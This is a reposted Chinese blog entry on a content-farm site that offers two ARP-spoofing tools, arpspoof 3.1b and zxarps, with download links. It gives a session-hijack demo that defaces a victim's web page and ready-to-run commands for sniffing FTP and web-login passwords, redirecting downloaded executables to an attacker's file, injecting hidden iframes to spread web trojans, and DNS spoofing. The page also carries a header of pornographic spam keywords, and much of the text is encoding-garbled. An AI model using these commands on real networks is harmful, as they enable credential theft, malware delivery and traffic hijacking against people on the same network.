日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

最近幻影的两个ARP欺骗工具 挺不错的

發(fā)布時間:2023/12/10 编程问答 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 最近幻影的两个ARP欺骗工具 挺不错的 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

?arpspoof 3.1b

主要功能:ARP欺騙過程中進(jìn)行數(shù)據(jù)修改,實(shí)現(xiàn)會話劫持攻擊
說明: 本程序公開源代碼,為了換取更多朋友的指教

實(shí)例: 欺騙192.168.0.108訪問百度網(wǎng)站的全過程(注:#后是我加的注釋)
效果: 192.168.0.108看到的百度首頁只有一句話“Hack by cooldiyer”,攻擊成功。
圖解:
__________________________________________________________________________________
F:/arpspoof/Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自動生成的規(guī)則文件,就能搞定

F:/arpspoof/Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30
[*] Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加載文件job.txt中的規(guī)則,可用arpspoof /n生成模板
[*] Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules... # 共加載了兩條規(guī)則,如果文件格式不對,程序在這里會中斷
[*] Spoofing 192.168.0.1 <-> 192.168.0.108 # 開始arpspoof欺騙,監(jiān)視轉(zhuǎn)發(fā)的數(shù)據(jù)包
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一個需要轉(zhuǎn)發(fā)的數(shù)據(jù)包,但沒找到要替換的字符串
[*] Forwarding untouched packet of size 62 # 所以直接轉(zhuǎn)發(fā)出去,以下幾個也是
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
[*] Forwarding untouched packet of size 62
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 399
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一個需要轉(zhuǎn)發(fā)的數(shù)據(jù)包,找到了要替換的內(nèi)容,應(yīng)用規(guī)則。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替換成了“Hack by cooldiyer<noframes>”
[*] Done 1 replacements, forwarding packet of size 1474 # 給出提示這個數(shù)據(jù)包被替換了多少次,替換后包的大小 (調(diào)試用的)
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 1474
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 237
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Reseting ..... # Ctrl+C,程序自動恢復(fù)受騙主機(jī)的ARP緩存
[-] Sleep 5s ............ # 5秒退出
__________________________________________________________________________________

其它說明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存數(shù)據(jù)到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只顯示數(shù)據(jù)
被替換的字符串要盡可能的短,這樣能減少程序負(fù)擔(dān),可參考arpspoof /n生成的規(guī)則文件job.txt
需要說的是程序在公網(wǎng)下照樣使用,我已經(jīng)解說過了,不再舉例.........
規(guī)則文件的使用可以看程序的書寫,本程序開放源代碼
希望測試出更多Bug, 我努力更新。。
By CoolDiyer 2006-11-12

下載:http://allyesno.gbaopan.com/files/127df7d9d1ee441d9994959af8e24c21.gbp

zxarps

在當(dāng)今網(wǎng)馬橫飛的日子,我帖個東東,讓網(wǎng)馬飛得更猛烈些吧

說明:
需要winPcap
基于arp欺騙,
具體功能看下面的使用說明~~~懶得打太多字了~~~

一些注意:
通常欺騙都是針對 網(wǎng)關(guān)和同網(wǎng)段下的其他機(jī),所以-sethost [ip] 參數(shù)可以不填,
但如果同網(wǎng)段下有某server,而你想嗅探其他用戶到該server的數(shù)據(jù)就要-sethost serverIP

Codz:

???????

0. Realtek RTL8139

????IP Address
. . . . . : 192.168.1.101

????Physical Address
. . : 00-11-D8-6B-5E-19

????
Default Gateway . . : 192.168.1.1



1. WAN
(PPP/SLIP) Interface

????IP Address
. . . . . : xx.xx.xx.xx

????Physical Address
. . : 00-52-00-00-00-00

????
Default Gateway . . : xx.xx.xx.xx

options
:

????-
idx [index]???????網(wǎng)卡索引號

????
-ip [ip]???????????欺騙的IP,'-'指定范圍,','隔開

????
-sethost [ip]??????默認(rèn)是網(wǎng)關(guān),可以指定別的IP

????
-port [port]???????關(guān)注的端口,'-'指定范圍,','隔開,沒指定默認(rèn)關(guān)注所有端口

????
-reset?????????????恢復(fù)目標(biāo)機(jī)的ARP表

????
-hostname??????????探測主機(jī)時獲取主機(jī)名信息

????
-logfilter [string]設(shè)置保存數(shù)據(jù)的條件,必須+-_做前綴,后跟關(guān)鍵字,

???????????????????????
','隔開關(guān)鍵字,多個條件'|'隔開

???????????????????????所有帶
+前綴的關(guān)鍵字都出現(xiàn)的包則寫入文件

???????????????????????帶
-前綴的關(guān)鍵字出現(xiàn)的包不寫入文件

???????????????????????帶_前綴的關(guān)鍵字一個符合則寫入文件
(如有+-條件也要符合)

????-
save_a [filename] 將捕捉到的數(shù)據(jù)寫入文件 ACSII模式

????
-save_h [filename] HEX模式



????
-hacksite [ip]?????指定要插入代碼的站點(diǎn)域名或IP,

???????????????????????
多個可用','隔開,沒指定則影響所有站點(diǎn)

????
-insert [html code]指定要插入html代碼



????
-postfix [string]??關(guān)注的后綴名,只關(guān)注HTTP/1.1 302

????
-hackURL [url]?????發(fā)現(xiàn)關(guān)注的后綴名后修改URL到新的URL

????
-filename [name]???新URL上有效的資源文件名



????
-hackdns [string]??DNS欺騙,只修改UDP的報(bào)文,多個可用','隔開

???????????????????????格式
: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1



????
-Interval [ms]?????定時欺騙的時間間隔,單位:毫秒:默認(rèn)是3000 ms

????
-spoofmode [1|2|3] 將數(shù)據(jù)騙發(fā)到本機(jī),欺騙對象:1為網(wǎng)關(guān),2為目標(biāo)機(jī),3為兩者(默認(rèn))

????-
speed [kb]????????限制指定的IP或IP段的網(wǎng)絡(luò)總帶寬,單位:KB



example
:

????
嗅探指定的IP段中端口80的數(shù)據(jù),并以HEX模式寫入文件

????zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log



????FTP嗅探
,在21或2121端口中出現(xiàn)USER或PASS的數(shù)據(jù)包記錄到文件

????zxarps
.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log



????HTTP web郵箱登陸或一些論壇登陸的嗅探
,根據(jù)情況自行改關(guān)鍵字

????zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log



????用
|添加嗅探條件,這樣FTP和HTTP的一些敏感關(guān)鍵字可以一起嗅探

????zxarps
.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log



????如果嗅探到目標(biāo)下載文件后綴是exe等則更改Location
:為http://xx.net/test.exe

????
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe



????
指定的IP段中的用戶訪問到-hacksite中的網(wǎng)址則只顯示just for fun

????zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>"



????
指定的IP段中的用戶訪問的所有網(wǎng)站都插入一個框架代碼

????zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"



????
指定的兩個IP的總帶寬限制到20KB

????zxarps
.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20



????DNS欺騙

????zxarps
.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"



zxarps Build 01/19/2007 By LZX.

?

下載:http://allyesno.gbaopan.com/files/caef438cb81649dda7da376e515be0b7.gbp

???????????

再分享一下我老師大神的人工智能教程吧。零基礎(chǔ)!通俗易懂!風(fēng)趣幽默!還帶黃段子!希望你也加入到我們?nèi)斯ぶ悄艿年?duì)伍中來!https://blog.csdn.net/jiangjunshow

總結(jié)

以上是生活随笔為你收集整理的最近幻影的两个ARP欺骗工具 挺不错的的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。